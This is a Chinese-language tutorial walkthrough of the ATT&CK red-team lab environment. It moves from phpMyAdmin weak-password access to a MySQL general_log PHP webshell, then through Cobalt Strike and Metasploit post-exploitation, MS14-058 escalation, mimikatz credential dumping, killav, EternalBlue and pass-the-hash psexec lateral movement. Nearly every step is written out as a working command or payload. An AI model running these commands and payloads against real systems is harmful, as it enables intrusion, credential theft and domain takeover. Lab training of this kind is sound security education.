ATK&CK红队评估(一) 渗透测试实战教学文档

环境搭建

环境概述

• 三台虚拟主机默认密码：hongrisec@2019
• 可能提示密码过期，需自行修改
• 网络拓扑：
  • Win7服务器作为网关，配置两张网卡
    • 网卡1：VMnet1仅主机模式(内网)
    • 网卡2：NAT模式(外网)
  • Win2003、Win2008：VMnet1仅主机模式(内网)

IP地址分配

• Win7: 192.168.52.143(内)/192.168.126.188(外)
• Win2003: 192.168.52.141
• Win2008: 192.168.52.138
• 攻击机Kali: 192.168.126.130

环境验证

1. 用Win7 ping Kali确认连通性
2. 在Win7中启动phpstudy开启web服务

信息收集阶段

端口扫描

nmap --min-rate 10000 -p- 192.168.126.188
nmap -p 80,3306 -sV 192.168.126.188

发现开放端口：

• 80 - HTTP
• 3306 - MySQL

目录扫描

dirsearch -u http://192.168.126.188

初始攻击阶段

PHPMyAdmin弱口令攻击

1. 访问phpMyAdmin界面
2. 尝试弱口令组合：root/root成功登录
3. 通过php探针获取网站绝对路径：C:/phpStudy/WWW

获取WebShell方法

方法一：into outfile写入木马

select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/shell.php';

失败原因：secure_file_priv值为NULL

检查设置：

show global variables like '%secure%';

方法二：MySQL日志文件写入Shell

1. 查看日志状态：

show variables like '%general%';

2. 开启日志记录：

SET GLOBAL general_log='on';

3. 指定日志文件路径：

SET GLOBAL general_log_file='C:/phpStudy/www/shell.php';

4. 写入一句话木马：

SELECT '<?php eval($_POST["cmd"]);?>';

5. 使用蚁剑连接验证

内网渗透阶段

Cobalt Strike (CS) 后渗透

1. 生成exe后门并上传
2. 在蚁剑中执行后门：

start artifact.exe

3. 提权操作：
   • 使用MS14-058漏洞成功提权至system
   • 调整心跳时间设置为3s（实战中不宜过快）

信息收集命令

whoami /all
net start
ipconfig /all
route print
net view
net config Workstation
net user
net user /domain
net localgroup administrators
net view /domain
net group 组名 /domain
net user 用户名 /domain
net group "domain admins" /domain
net group "domain computers" /domain
net group "domain controllers" /domain
wmic useraccount get /all

域信息收集结果

• 域名：god.org
• 域内用户：Administrator、Guest、liukaifeng01、krbtgt、ligang
• 域内主机：
  • OWA(192.168.52.138) - 域控
  • ROOT-TVI862UBEH(192.168.52.141)
  • STU1(win7)
• Win7内网IP：192.168.52.143

凭证获取

1. 使用CS的hashdump读取内存密码
2. 使用mimikatz读取注册表密码：

logonpasswords

内网主机探测

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

横向移动技术

Cobalt Strike横向移动

1. 新建Listener，payload设置为Beacon SMB
2. 在已有beacon上右键spawn生成会话
3. 使用psexec横向移动至其他主机

Metasploit横向移动

1. 开启监听：

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.126.130
set lport 6666
run

2. 通过CS创建listener并上传执行木马
3. 后渗透模块使用：

run post/windows/gather/checkvm
run post/windows/manage/killav
sysinfo

4. 路由配置：

run post/multi/manage/autoroute
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

漏洞扫描(MS17-010)

1. 端口扫描：

use auxiliary/scanner/portscan/tcp
set rhost 192.158.52.138
set ports 80,135-139,445,3306,3389
run

2. 漏洞检测：

search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.138
run

3. 漏洞利用：

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

哈希传递攻击(PTH)

1. 使用hashdump获取哈希
2. 加载kiwi模块
3. 探测445端口：

use auxiliary/scanner/smb/smb_version
set rhost 192.168.52.138
set threads 40
run
set rhost 192.168.52.141
run

4. 哈希传递攻击：

use exploit/windows/smb/psexec
set rhosts 192.168.126.188
set SMBUser administrator
set smbpass 00000000000000000000000000000000:NTLM值

关键知识点总结

1. Web应用渗透：

   • PHPMyAdmin弱口令利用
   • MySQL日志文件getshell技术
   • secure_file_priv绕过方法

2. 后渗透技术：

   • Cobalt Strike的完整使用流程
   • MS14-058提权漏洞利用
   • 信息收集命令集

3. 横向移动技术：

   • SMB Beacon的使用
   • psexec横向移动
   • MS17-010漏洞利用

4. 域渗透技术：

   • 域信息收集方法
   • 哈希传递攻击(PTH)
   • mimikatz凭证获取

5. Metasploit高级使用：

   • 多阶段payload配置
   • 路由配置与内网穿透
   • 后渗透模块应用

本教学文档完整还原了从外网渗透到内网横向移动的全过程，涵盖了多种红队评估中常用的技术手段，可作为红队评估实战的参考指南。